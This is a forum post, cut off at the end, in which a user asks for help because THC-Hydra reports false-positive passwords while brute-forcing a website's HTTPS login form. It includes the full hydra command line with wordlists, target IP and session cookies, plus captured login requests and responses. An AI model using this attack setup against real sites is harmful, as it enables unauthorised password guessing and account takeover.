Forum Thread: Problems with THC-HYDRA Giving False Positive Passwords

hydra -L userdummy.txt -P passdummy.txt -vV 104.20.113.15 https-post-form "/website.com/sign-in:email=^USER^&password=^PASS^&login=Log+in+to+your+account:F=incorrect.:C= _cfduid=de9ff7a7ca4bc2968430ae81bf36e057e1536632635; PHPSESSID=vj8g88oje7k5u0nk9t9cvavlv2; gaTrackGEO=x; SERVERID=fe03; httpreferer=%2Fsign-in; ga=GA1.2.1543913319.1536632638; gid=GA1.2.1875996076.1536632638; gat=1"

This is my full command using the cookie from the request listed below.
POST /sign-in HTTP/1.1
Host: website.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: website.com/sign-in
Cookie: _cfduid=de9ff7a7ca4bc2968430ae81bf36e057e1536632635; PHPSESSID=vj8g88oje7k5u0nk9t9cvavlv2; gaTrackGEO=x; SERVERID=fe03; httpreferer=%2Fsign-in; ga=GA1.2.1543913319.1536632638; gid=GA1.2.1875996076.1536632638; gat=1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 61

email=username&password=password&login=Log+in+to+your+account

This request is a recording of the request form using an invalid username and password. When I use a correct password and username, the only thing that has changed is the end of the cookie, "gat=1". It is not there when using a valid password and username. I have tried using the cookie from a successful login and changed the "F=" to an "S=" in my hydra call command. The result is as follows: "1 of 1 target completed, 0 valid passwords found". And I get "1 of 1 target successfully completed, 24 valid passwords found", as if hydra is not seeing the failure message "email or password are incorect" or the failed request cookie "_cfduid=de9ff7a7ca4bc2968430ae81bf36e057e1536632635; PHPSESSID=vj8g88oje7k5u0nk9t9cvavlv2; gaTrackGEO=x; SERVERID=fe03; httpreferer=%2Fsign-in; ga=GA1.2.1543913319.1536632638; gid=GA1.2.1875996076.1536632638; _gat=1".

For your information, the hydra command breaks down like this: hydra (calling hydra) -L (use this username list) userlist.txt -P (use this pass list) passlist.txt -vV (verbose) 127.0.0.0 (host ip) https-get-form (method) "x:xxx:xxx" (host url:email/pass parameters/failure message or success message/optional parameter/optional parameter (cookie or header)).

I have tried several variants, including using the header "200 OK" as the optional parameter, in combination and without combination with the cookie. I've tried not using either. There must be something wrong with the failure parameter. I think hydra is struggling to differentiate a valid login from a failed one, and is therefore giving me either all valid passwords or all failed.

This is a copy of the request form using a valid login and valid password. As you can see, gat_1 has disappeared from the cookie and should work to help hydra differentiate a valid request from a failed one.

POST /sign-in HTTP/1.1
Host: website.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: website.com/sign-in
Cookie: _cfduid=de9ff7a7ca4bc2968430ae81bf36e057e1536632635; PHPSESSID=vj8g88oje7k5u0nk9t9cvavlv2; gaTrackGEO=x; SERVERID=fe03; httpreferer=%2Fsign-in; ga=GA1.2.1543913319.1536632638; _gid=GA1.2.1875996076.1536632638
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 59

email=iforgot&password=iforgot&login=Log+in+to+your+account

This is the response to that valid request:

HTTP/1.1 302 Moved Temporarily
Date: Tue, 11 Sep 2018 02:46:33 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: http_referer=%2Fsign-in; expires=Tue, 11-Sep-2018 03:46:33 GMT; path=/; domain=.website.com
Set-Cookie: loginkey=0067aa09e8bc1b2d92dece7acee917cc; expires=Tue, 18-Sep-2018 02:46:33 GMT; path=/; domain=.website.com
Location: /
Vary: Accept-Encoding
Expect-CT: max-age=604800, report-uri="report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Server: cloudflare
CF-RAY: 4586cdfa5b308d1d-PDX
Content-Length: 0

I have tried using the loginkey as the cookie for the success message. Doesn't work.

Connection: close
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: http_referer=%2Fsign-in; expires=Tue, 11-Sep-2018 03:24:37 GMT; path=/; domain=.website.com
Set-Cookie: return_url=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT
Vary: Accept-Encoding
Expect-CT: max-age=604800, report-uri="report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Server: cloudflare
CF-RAY: 4586add9adba8d23-PDX
Content-Length: 9156

This is the response to a request using an invalid password and username. I have tried using the return_url cookie as the failure parameter, but it doesn't work either.

I started combing through the source code for hydra to try to find an answer to my problem. I learned that if you escape your colons, then hydra will not count it as a separate parameter (ex: Cookie//:); I tried this with no success. I also learned that "Set-Cookie" is in the source code for hydra and therefore it should be able to read Set-Cookie: XXXX as a valid parameter. I understand that on websites like this no one will do the work for you. I'm not looking only for a straightforward answer, but more for guidance to find the answer to my problem. Thank you al
